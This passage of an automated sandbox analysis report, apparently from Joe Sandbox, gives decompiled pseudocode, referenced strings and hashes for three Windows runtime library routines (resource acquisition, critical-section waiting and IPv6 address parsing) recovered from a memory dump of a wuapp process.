                                                          • Instruction Fuzzy Hash: 4321D6B2D0021ADFDB21EE58CC00AEE77BCBB60710F894515ED86D3100DB76EA588BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 44%
                                                          			E01F853A5(signed int _a4, char _a8) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t32;
                                                          				signed int _t37;
                                                          				signed int _t40;
                                                          				signed int _t42;
                                                          				void* _t45;
                                                          				intOrPtr _t46;
                                                          				signed int _t49;
                                                          				void* _t51;
                                                          				signed int _t57;
                                                          				signed int _t64;
                                                          				signed int _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t78;
                                                          				signed int* _t79;
                                                          				void* _t85;
                                                          				signed int _t86;
                                                          				signed int _t92;
                                                          				void* _t104;
                                                          				void* _t105;
                                                          
                                                          				_t64 = _a4;
                                                          				_t32 =  *(_t64 + 0x28);
                                                          				_t71 = _t64 + 0x28;
                                                          				_push(_t92);
                                                          				if(_t32 < 0) {
                                                          					_t78 =  *[fs:0x18];
                                                          					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                          					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                          						goto L3;
                                                          					} else {
                                                          						__eflags = _t32 | 0xffffffff;
                                                          						asm("lock xadd [ecx], eax");
                                                          						return 1;
                                                          					}
                                                          				} else {
                                                          					L3:
                                                          					_push(_t86);
                                                          					while(1) {
                                                          						L4:
                                                          						__eflags = _t32;
                                                          						if(_t32 == 0) {
                                                          							break;
                                                          						}
                                                          						__eflags = _a8;
                                                          						if(_a8 == 0) {
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						} else {
                                                          							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                          							_t79 = _t64 + 0x24;
                                                          							_t71 = 1;
                                                          							asm("lock xadd [eax], ecx");
                                                          							_t32 =  *(_t64 + 0x28);
                                                          							_a4 = _t32;
                                                          							__eflags = _t32;
                                                          							if(_t32 != 0) {
                                                          								L19:
                                                          								_t86 = 0;
                                                          								__eflags = 0;
                                                          								while(1) {
                                                          									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                          									asm("sbb esi, esi");
                                                          									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020401c0;
                                                          									_push(_t92);
                                                          									_push(0);
                                                          									_t37 = E01F5F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                          									__eflags = _t37 - 0x102;
                                                          									if(_t37 != 0x102) {
                                                          										break;
                                                          									}
                                                          									_t71 =  *(_t92 + 4);
                                                          									_t85 =  *_t92;
                                                          									_t51 = E01FA4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                          									_push(_t85);
                                                          									_push(_t51);
                                                          									E01FB3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                          									E01FB3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                          									_t86 = _t86 + 1;
                                                          									_t105 = _t104 + 0x28;
                                                          									__eflags = _t86 - 2;
                                                          									if(__eflags > 0) {
                                                          										E01FE217A(_t71, __eflags, _t64);
                                                          									}
                                                          									_push("RTL: Re-Waiting\n");
                                                          									_push(0);
                                                          									_push(0x65);
                                                          									E01FB3F92();
                                                          									_t104 = _t105 + 0xc;
                                                          								}
                                                          								__eflags = _t37;
                                                          								if(__eflags < 0) {
                                                          									_push(_t37);
                                                          									E01FA3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                          									asm("int3");
                                                          									_t40 =  *_t71;
                                                          									 *_t71 = 0;
                                                          									__eflags = _t40;
                                                          									if(_t40 == 0) {
                                                          										L1:
                                                          										_t42 = E01F85384(_t92 + 0x24);
                                                          										if(_t42 != 0) {
                                                          											goto L31;
                                                          										} else {
                                                          											goto L2;
                                                          										}
                                                          									} else {
                                                          										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                          										_push( &_a4);
                                                          										_push(_t40);
                                                          										_t49 = E01F5F970( *((intOrPtr*)(_t92 + 0x18)));
                                                          										__eflags = _t49;
                                                          										if(__eflags >= 0) {
                                                          											goto L1;
                                                          										} else {
                                                          											_push(_t49);
                                                          											E01FA3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                          											L31:
                                                          											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                          											_push( &_a4);
                                                          											_push(1);
                                                          											_t42 = E01F5F970( *((intOrPtr*)(_t92 + 0x20)));
                                                          											__eflags = _t42;
                                                          											if(__eflags >= 0) {
                                                          												L2:
                                                          												return _t42;
                                                          											} else {
                                                          												_push(_t42);
                                                          												E01FA3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                          												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                          												_push( &_a4);
                                                          												_push(1);
                                                          												_t42 = E01F5F970( *((intOrPtr*)(_t92 + 0x20)));
                                                          												__eflags = _t42;
                                                          												if(__eflags >= 0) {
                                                          													goto L2;
                                                          												} else {
                                                          													_push(_t42);
                                                          													_t45 = E01FA3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                          													asm("int3");
                                                          													while(1) {
                                                          														_t74 = _t45;
                                                          														__eflags = _t45 - 1;
                                                          														if(_t45 != 1) {
                                                          															break;
                                                          														}
                                                          														_t86 = _t86 | 0xffffffff;
                                                          														_t45 = _t74;
                                                          														asm("lock cmpxchg [ebx], edi");
                                                          														__eflags = _t45 - _t74;
                                                          														if(_t45 != _t74) {
                                                          															continue;
                                                          														} else {
                                                          															_t46 =  *[fs:0x18];
                                                          															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                          															return _t46;
                                                          														}
                                                          														goto L37;
                                                          													}
                                                          													E01F85329(_t74, _t92);
                                                          													_push(1);
                                                          													return E01F853A5(_t92);
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								} else {
                                                          									_t32 =  *(_t64 + 0x28);
                                                          									continue;
                                                          								}
                                                          							} else {
                                                          								_t71 =  *_t79;
                                                          								__eflags = _t71;
                                                          								if(__eflags > 0) {
                                                          									while(1) {
                                                          										_t57 = _t71;
                                                          										asm("lock cmpxchg [edi], esi");
                                                          										__eflags = _t57 - _t71;
                                                          										if(_t57 == _t71) {
                                                          											break;
                                                          										}
                                                          										_t71 = _t57;
                                                          										__eflags = _t57;
                                                          										if(_t57 > 0) {
                                                          											continue;
                                                          										}
                                                          										break;
                                                          									}
                                                          									_t32 = _a4;
                                                          									__eflags = _t71;
                                                          								}
                                                          								if(__eflags != 0) {
                                                          									continue;
                                                          								} else {
                                                          									goto L19;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L37;
                                                          					}
                                                          					_t71 = _t71 | 0xffffffff;
                                                          					_t32 = 0;
                                                          					asm("lock cmpxchg [edx], ecx");
                                                          					__eflags = 0;
                                                          					if(0 != 0) {
                                                          						goto L4;
                                                          					} else {
                                                          						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                          						return 1;
                                                          					}
                                                          				}
                                                          				L37:
                                                          			}


























                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FC22F4
                                                          Strings
                                                          • RTL: Resource at %p, xrefs: 01FC230B
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01FC22FC
                                                          • RTL: Re-Waiting, xrefs: 01FC2328
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-871070163
                                                          • Opcode ID: 5e46a0feaf6032f95feab3abf1756df5e150e2fbef8fb1a73cb3abc8c574a991
                                                          • Instruction ID: a2e6bc2cbe00a266f38a02cc94197abdc079886d4877cb055abcd12de35d3392
                                                          • Opcode Fuzzy Hash: 5e46a0feaf6032f95feab3abf1756df5e150e2fbef8fb1a73cb3abc8c574a991
                                                          • Instruction Fuzzy Hash: 37511B71601703ABEB15EF29CC80FAA73AEEF59720F104229FD45DB251EA77E8418790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 51%
                                                          			E01F8EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v24;
                                                          				intOrPtr* _v28;
                                                          				intOrPtr _v32;
                                                          				signed int _v36;
                                                          				intOrPtr _v40;
                                                          				short _v66;
                                                          				char _v72;
                                                          				void* __esi;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t39;
                                                          				signed int _t40;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t43;
                                                          				signed int _t44;
                                                          				void* _t46;
                                                          				intOrPtr _t48;
                                                          				signed int _t49;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t53;
                                                          				signed char _t67;
                                                          				void* _t72;
                                                          				intOrPtr _t77;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr _t84;
                                                          				intOrPtr* _t85;
                                                          				void* _t91;
                                                          				void* _t92;
                                                          				void* _t93;
                                                          
                                                          				_t80 = __edi;
                                                          				_t75 = __edx;
                                                          				_t70 = __ecx;
                                                          				_t84 = _a4;
                                                          				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                          					E01F7DA92(__ecx, __edx, __eflags, _t84);
                                                          					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                          				}
                                                          				_push(0);
                                                          				__eflags = _t38 - 0xffffffff;
                                                          				if(_t38 == 0xffffffff) {
                                                          					_t39 =  *0x204793c; // 0x0
                                                          					_push(0);
                                                          					_push(_t84);
                                                          					_t40 = E01F616C0(_t39);
                                                          				} else {
                                                          					_t40 = E01F5F9D4(_t38);
                                                          				}
                                                          				_pop(_t85);
                                                          				__eflags = _t40;
                                                          				if(__eflags < 0) {
                                                          					_push(_t40);
                                                          					E01FA3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                          					asm("int3");
                                                          					while(1) {
                                                          						L21:
                                                          						_t76 =  *[fs:0x18];
                                                          						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                          						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                          						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                          							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                          							_v66 = 0x1722;
                                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                          							_t76 =  &_v72;
                                                          							_push( &_v72);
                                                          							_v28 = _t85;
                                                          							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                          							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                          							_push(0x10);
                                                          							_push(0x20402);
                                                          							E01F601A4( *0x7ffe0382 & 0x000000ff);
                                                          						}
                                                          						while(1) {
                                                          							_t43 = _v8;
                                                          							_push(_t80);
                                                          							_push(0);
                                                          							__eflags = _t43 - 0xffffffff;
                                                          							if(_t43 == 0xffffffff) {
                                                          								_t71 =  *0x204793c; // 0x0
                                                          								_push(_t85);
                                                          								_t44 = E01F61F28(_t71);
                                                          							} else {
                                                          								_t44 = E01F5F8CC(_t43);
                                                          							}
                                                          							__eflags = _t44 - 0x102;
                                                          							if(_t44 != 0x102) {
                                                          								__eflags = _t44;
                                                          								if(__eflags < 0) {
                                                          									_push(_t44);
                                                          									E01FA3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                          									asm("int3");
                                                          									E01FE2306(_t85);
                                                          									__eflags = _t67 & 0x00000002;
                                                          									if((_t67 & 0x00000002) != 0) {
                                                          										_t7 = _t67 + 2; // 0x4
                                                          										_t72 = _t7;
                                                          										asm("lock cmpxchg [edi], ecx");
                                                          										__eflags = _t67 - _t67;
                                                          										if(_t67 == _t67) {
                                                          											E01F8EC56(_t72, _t76, _t80, _t85);
                                                          										}
                                                          									}
                                                          									return 0;
                                                          								} else {
                                                          									__eflags = _v24;
                                                          									if(_v24 != 0) {
                                                          										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                          									}
                                                          									return 2;
                                                          								}
                                                          								goto L36;
                                                          							}
                                                          							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                          							_push(_t67);
                                                          							_t46 = E01FA4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                          							_push(_t77);
                                                          							E01FB3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                          							_t48 =  *_t85;
                                                          							_t92 = _t91 + 0x18;
                                                          							__eflags = _t48 - 0xffffffff;
                                                          							if(_t48 == 0xffffffff) {
                                                          								_t49 = 0;
                                                          								__eflags = 0;
                                                          							} else {
                                                          								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                          							}
                                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                          							_push(_t49);
                                                          							_t50 = _v12;
                                                          							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                          							_push(_t85);
                                                          							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                          							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                          							E01FB3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                          							_t53 =  *_t85;
                                                          							_t93 = _t92 + 0x20;
                                                          							_t67 = _t67 + 1;
                                                          							__eflags = _t53 - 0xffffffff;
                                                          							if(_t53 != 0xffffffff) {
                                                          								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                          								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                          							}
                                                          							__eflags = _t67 - 2;
                                                          							if(_t67 > 2) {
                                                          								__eflags = _t85 - 0x20420c0;
                                                          								if(_t85 != 0x20420c0) {
                                                          									_t76 = _a4;
                                                          									__eflags = _a4 - _a8;
                                                          									if(__eflags == 0) {
                                                          										E01FE217A(_t71, __eflags, _t85);
                                                          									}
                                                          								}
                                                          							}
                                                          							_push("RTL: Re-Waiting\n");
                                                          							_push(0);
                                                          							_push(0x65);
                                                          							_a8 = _a4;
                                                          							E01FB3F92();
                                                          							_t91 = _t93 + 0xc;
                                                          							__eflags =  *0x7ffe0382;
                                                          							if( *0x7ffe0382 != 0) {
                                                          								goto L21;
                                                          							}
                                                          						}
                                                          						goto L36;
                                                          					}
                                                          				} else {
                                                          					return _t40;
                                                          				}
                                                          				L36:
                                                          			}


































                                                          Strings
                                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01FC24BD
                                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01FC248D
                                                          • RTL: Re-Waiting, xrefs: 01FC24FA
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                          • API String ID: 0-3177188983
                                                          • Opcode ID: 5cb9dc455e307637d4e2d476ae6dee08ca6c451eeec85dfda5603688acaa44e9
                                                          • Instruction ID: 1e7ebfbac1567baacf1eeeb3e9437742d1574dad9f5753412d2412e374bef890
                                                          • Opcode Fuzzy Hash: 5cb9dc455e307637d4e2d476ae6dee08ca6c451eeec85dfda5603688acaa44e9
                                                          • Instruction Fuzzy Hash: EC41F8B1A00206EBD724EB68CD88F6A7BB9EF45720F108609F6559B2C2D737E941C760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01F9FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				signed int _t105;
                                                          				void* _t110;
                                                          				char _t114;
                                                          				short _t115;
                                                          				void* _t118;
                                                          				signed short* _t119;
                                                          				short _t120;
                                                          				char _t122;
                                                          				void* _t127;
                                                          				void* _t130;
                                                          				signed int _t136;
                                                          				intOrPtr _t143;
                                                          				signed int _t158;
                                                          				signed short* _t164;
                                                          				signed int _t167;
                                                          				void* _t170;
                                                          
                                                          				_t158 = 0;
                                                          				_t164 = _a4;
                                                          				_v20 = 0;
                                                          				_v24 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				_v16 = 0;
                                                          				_v28 = 0;
                                                          				_t136 = 0;
                                                          				while(1) {
                                                          					_t167 =  *_t164 & 0x0000ffff;
                                                          					if(_t167 == _t158) {
                                                          						break;
                                                          					}
                                                          					_t118 = _v20 - _t158;
                                                          					if(_t118 == 0) {
                                                          						if(_t167 == 0x3a) {
                                                          							if(_v12 > _t158 || _v8 > _t158) {
                                                          								break;
                                                          							} else {
                                                          								_t119 =  &(_t164[1]);
                                                          								if( *_t119 != _t167) {
                                                          									break;
                                                          								}
                                                          								_t143 = 2;
                                                          								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                          								_v28 = 1;
                                                          								_v8 = _t143;
                                                          								_t136 = _t136 + 1;
                                                          								L47:
                                                          								_t164 = _t119;
                                                          								_v20 = _t143;
                                                          								L14:
                                                          								if(_v24 == _t158) {
                                                          									L19:
                                                          									_t164 =  &(_t164[1]);
                                                          									_t158 = 0;
                                                          									continue;
                                                          								}
                                                          								if(_v12 == _t158) {
                                                          									if(_v16 > 4) {
                                                          										L29:
                                                          										return 0xc000000d;
                                                          									}
                                                          									_t120 = E01F9EE02(_v24, _t158, 0x10);
                                                          									_t170 = _t170 + 0xc;
                                                          									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                          									_t136 = _t136 + 1;
                                                          									goto L19;
                                                          								}
                                                          								if(_v16 > 3) {
                                                          									goto L29;
                                                          								}
                                                          								_t122 = E01F9EE02(_v24, _t158, 0xa);
                                                          								_t170 = _t170 + 0xc;
                                                          								if(_t122 > 0xff) {
                                                          									goto L29;
                                                          								}
                                                          								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                          								goto L19;
                                                          							}
                                                          						}
                                                          						L21:
                                                          						if(_v8 > 7 || _t167 >= 0x80) {
                                                          							break;
                                                          						} else {
                                                          							if(E01F9685D(_t167, 4) == 0) {
                                                          								if(E01F9685D(_t167, 0x80) != 0) {
                                                          									if(_v12 > 0) {
                                                          										break;
                                                          									}
                                                          									_t127 = 1;
                                                          									_a7 = 1;
                                                          									_v24 = _t164;
                                                          									_v20 = 1;
                                                          									_v16 = 1;
                                                          									L36:
                                                          									if(_v20 == _t127) {
                                                          										goto L19;
                                                          									}
                                                          									_t158 = 0;
                                                          									goto L14;
                                                          								}
                                                          								break;
                                                          							}
                                                          							_a7 = 0;
                                                          							_v24 = _t164;
                                                          							_v20 = 1;
                                                          							_v16 = 1;
                                                          							goto L19;
                                                          						}
                                                          					}
                                                          					_t130 = _t118 - 1;
                                                          					if(_t130 != 0) {
                                                          						if(_t130 == 1) {
                                                          							goto L21;
                                                          						}
                                                          						_t127 = 1;
                                                          						goto L36;
                                                          					}
                                                          					if(_t167 >= 0x80) {
                                                          						L7:
                                                          						if(_t167 == 0x3a) {
                                                          							_t158 = 0;
                                                          							if(_v12 > 0 || _v8 > 6) {
                                                          								break;
                                                          							} else {
                                                          								_t119 =  &(_t164[1]);
                                                          								if( *_t119 != _t167) {
                                                          									_v8 = _v8 + 1;
                                                          									L13:
                                                          									_v20 = _t158;
                                                          									goto L14;
                                                          								}
                                                          								if(_v28 != 0) {
                                                          									break;
                                                          								}
                                                          								_v28 = _v8 + 1;
                                                          								_t143 = 2;
                                                          								_v8 = _v8 + _t143;
                                                          								goto L47;
                                                          							}
                                                          						}
                                                          						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                          							break;
                                                          						} else {
                                                          							_v12 = _v12 + 1;
                                                          							_t158 = 0;
                                                          							goto L13;
                                                          						}
                                                          					}
                                                          					if(E01F9685D(_t167, 4) != 0) {
                                                          						_v16 = _v16 + 1;
                                                          						goto L19;
                                                          					}
                                                          					if(E01F9685D(_t167, 0x80) != 0) {
                                                          						_v16 = _v16 + 1;
                                                          						if(_v12 > 0) {
                                                          							break;
                                                          						}
                                                          						_a7 = 1;
                                                          						goto L19;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				 *_a8 = _t164;
                                                          				if(_v12 != 0) {
                                                          					if(_v12 != 3) {
                                                          						goto L29;
                                                          					}
                                                          					_v8 = _v8 + 1;
                                                          				}
                                                          				if(_v28 != 0 || _v8 == 7) {
                                                          					if(_v20 != 1) {
                                                          						if(_v20 != 2) {
                                                          							goto L29;
                                                          						}
                                                          						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                          						L65:
                                                          						_t105 = _v28;
                                                          						if(_t105 != 0) {
                                                          							_t98 = (_t105 - _v8) * 2; // 0x11
                                                          							E01F78980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                          							_t110 = 8;
                                                          							E01F6DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                          						}
                                                          						return 0;
                                                          					}
                                                          					if(_v12 != 0) {
                                                          						if(_v16 > 3) {
                                                          							goto L29;
                                                          						}
                                                          						_t114 = E01F9EE02(_v24, 0, 0xa);
                                                          						_t170 = _t170 + 0xc;
                                                          						if(_t114 > 0xff) {
                                                          							goto L29;
                                                          						}
                                                          						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                          						goto L65;
                                                          					}
                                                          					if(_v16 > 4) {
                                                          						goto L29;
                                                          					}
                                                          					_t115 = E01F9EE02(_v24, 0, 0x10);
                                                          					_t170 = _t170 + 0xc;
                                                          					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                          					goto L65;
                                                          				} else {
                                                          					goto L29;
                                                          				}
                                                          			}


























                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: __fassign
                                                          • String ID:
                                                          • API String ID: 3965848254-0
                                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                          • Instruction ID: df4d89f07c677ee7e912b1fe13b5e5b56f7308fd0934f375d79e8eea9ef4e239
                                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                          • Instruction Fuzzy Hash: 0C91AD72D0420AEEEF24EF98C8456EEBFB4EF45705F24806AD511E7252E7324A81CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%